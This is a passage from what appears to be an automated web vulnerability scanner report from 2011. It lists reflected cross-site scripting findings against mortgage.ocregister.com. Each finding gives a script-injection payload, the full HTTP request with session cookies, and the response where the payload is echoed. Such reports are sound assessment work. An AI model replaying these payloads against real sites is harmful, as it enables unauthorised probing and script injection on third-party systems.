Path:   /2007/10/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 218bc"><script>alert(1)</script>3aaf6a800aa was submitted in the REST URL parameter 2. This input was echoed as 218bc\"><script>alert(1)</script>3aaf6a800aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/10218bc"><script>alert(1)</script>3aaf6a800aa/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:54 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/10218bc\"><script>alert(1)</script>3aaf6a800aa/feed/" />
...[SNIP]...

1.236. http://mortgage.ocregister.com/2007/10/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/10/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7a6b"><script>alert(1)</script>aa7394ea76f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b7a6b\"><script>alert(1)</script>aa7394ea76f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/10/?b7a6b"><script>alert(1)</script>aa7394ea76f=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 October - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/10/?b7a6b\"><script>alert(1)</script>aa7394ea76f=1feed/" />
...[SNIP]...

1.237. http://mortgage.ocregister.com/2007/11/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/11/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78913"><script>alert(1)</script>415c27e9059 was submitted in the REST URL parameter 1. This input was echoed as 78913\"><script>alert(1)</script>415c27e9059 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /200778913"><script>alert(1)</script>415c27e9059/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200778913\"><script>alert(1)</script>415c27e9059/11/feed/" />
...[SNIP]...

1.238. http://mortgage.ocregister.com/2007/11/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/11/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55a46"><script>alert(1)</script>b3caab2696d was submitted in the REST URL parameter 2. This input was echoed as 55a46\"><script>alert(1)</script>b3caab2696d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/1155a46"><script>alert(1)</script>b3caab2696d/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:46 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/1155a46\"><script>alert(1)</script>b3caab2696d/feed/" />
...[SNIP]...

1.239. http://mortgage.ocregister.com/2007/11/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d88ca"><script>alert(1)</script>829bb9d7991 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d88ca\"><script>alert(1)</script>829bb9d7991 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/11/?d88ca"><script>alert(1)</script>829bb9d7991=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 November - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/11/?d88ca\"><script>alert(1)</script>829bb9d7991=1feed/" />
...[SNIP]...

1.240. http://mortgage.ocregister.com/2007/12/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/12/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83bb0"><script>alert(1)</script>5b51746308e was submitted in the REST URL parameter 1. This input was echoed as 83bb0\"><script>alert(1)</script>5b51746308e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /200783bb0"><script>alert(1)</script>5b51746308e/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:31 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200783bb0\"><script>alert(1)</script>5b51746308e/12/feed/" />
...[SNIP]...

1.241. http://mortgage.ocregister.com/2007/12/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/12/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7553a"><script>alert(1)</script>4b6519fec9b was submitted in the REST URL parameter 2. This input was echoed as 7553a\"><script>alert(1)</script>4b6519fec9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/127553a"><script>alert(1)</script>4b6519fec9b/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/127553a\"><script>alert(1)</script>4b6519fec9b/feed/" />
...[SNIP]...

1.242. http://mortgage.ocregister.com/2007/12/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2007/12/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db24"><script>alert(1)</script>33a184a2162 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4db24\"><script>alert(1)</script>33a184a2162 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2007/12/?4db24"><script>alert(1)</script>33a184a2162=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2007 December - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/12/?4db24\"><script>alert(1)</script>33a184a2162=1feed/" />
...[SNIP]...

1.243. http://mortgage.ocregister.com/2008/01/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/01/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47d30"><script>alert(1)</script>9a1798c9a18 was submitted in the REST URL parameter 1. This input was echoed as 47d30\"><script>alert(1)</script>9a1798c9a18 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /200847d30"><script>alert(1)</script>9a1798c9a18/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200847d30\"><script>alert(1)</script>9a1798c9a18/01/feed/" />
...[SNIP]...

1.244. http://mortgage.ocregister.com/2008/01/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/01/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de23d"><script>alert(1)</script>2d509002565 was submitted in the REST URL parameter 2. This input was echoed as de23d\"><script>alert(1)</script>2d509002565 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/01de23d"><script>alert(1)</script>2d509002565/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/01de23d\"><script>alert(1)</script>2d509002565/feed/" />
...[SNIP]...

1.245. http://mortgage.ocregister.com/2008/01/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/01/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fd34"><script>alert(1)</script>6eeaa914028 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1fd34\"><script>alert(1)</script>6eeaa914028 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/01/?1fd34"><script>alert(1)</script>6eeaa914028=1 HTTP/1.1
Host: mortgage.ocregister.co